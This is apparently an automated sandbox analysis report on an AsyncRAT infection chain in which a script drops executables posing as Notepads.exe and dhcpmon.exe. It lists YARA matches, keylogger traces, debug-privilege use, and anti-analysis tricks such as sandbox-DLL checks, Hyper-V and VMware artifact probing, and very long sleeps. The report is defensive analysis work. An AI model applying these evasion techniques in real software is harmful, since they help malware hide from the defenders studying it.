Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AsyncRAT

Source: Yara match	File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
Source: Yara match	File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match	File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
Source: Yara match	File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Notepads.exe	Binary or memory string: SBIEDLL.DLL
Source: wscript.exe, 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, ame.exe, 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Notepads.exe, 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Notepads.exe.3.dr	Binary or memory string: SBIEDLL.DLLME: CHAT

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\ame.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\fi.exe

Window / User API: foregroundWindowGot 933

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\ame.exe TID: 6628	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6724	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6692	Thread sleep time: -200000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6984	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe TID: 3000	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\Notepads.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains functionality to query system information

Source: C:\Users\user\AppData\Local\Temp\fi.exe

Code function: 4_2_02340D66 GetSystemInfo,

4_2_02340D66

Contains medium sleeps (>= 30s)

Source: C:\Users\user\AppData\Local\Temp\ame.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Thread delayed: delay time: 922337203685477

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes6
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp	Binary or memory string: $Hyper-V Hypervisor Logical Processor
Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes[
Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor.
Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.594189844.000000000150C000.00000004.00000020.sdmp, Notepads.exe, 0000001E.00000002.575946515.0000000001378000.00000004.00000020.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition~
Source: Notepads.exe, 0000001E.00000002.587730266.000000001BF61000.00000004.00000001.sdmp	Binary or memory string: &Hyper-V Hypervisorw
Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Notepads.exe, 0000001A.00000003.562811005.000000001BFAF000.00000004.00000001.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipesk|
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp	Binary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp	Binary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipesx
Source: Notepads.exe, 0000001A.00000002.603514623.000000001C841000.00000004.00000001.sdmp	Binary or memory string: % Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186P
Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes:
Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes*
Source: ame.exe, 00000003.00000003.526302917.000000001B2B7000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes
Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp	Binary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp	Binary or memory string: *Hyper-V Virtual Machine Bus Provider Pipes
Source: ame.exe, 00000003.00000002.555441828.000000001C01C000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes[
Source: Notepads.exe.3.dr	Binary or memory string: vmware
Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus]
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: ame.exe, 00000003.00000003.526156092.000000001C056000.00000004.00000001.sdmp	Binary or memory string: st Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
Source: Notepads.exe, 0000001A.00000003.562007200.000000001C859000.00000004.00000001.sdmp	Binary or memory string: lows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWance%SystemRoot%\system32\mswsock.dll2e,00,4e,00,45,00,54,00,20,00,43,00,4c,00,52,00,20,00,44,00,61,00,74,00,61,00,00,00,00,00.NET CLR Data6
Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus
Source: ame.exe, 00000003.00000003.526118644.000000001C031000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000003.574433837.000000001BCD9000.00000004.00000001.sdmp	Binary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx BusM
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp	Binary or memory string: !Hyper-V Hypervisor Root Partition
Source: ame.exe, 00000003.00000002.534630144.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider PipesP
Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Users\user\AppData\Local\Temp\ame.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse usering and debugging

Source: C:\Users\user\AppData\Local\Temp\ame.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: ame.exe.1.dr

Jump to dropped file

.NET source code references suspicious native API functions

Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: dhcpmon.exe.4.dr, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs	Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs	Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs	Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs	Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs	Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')

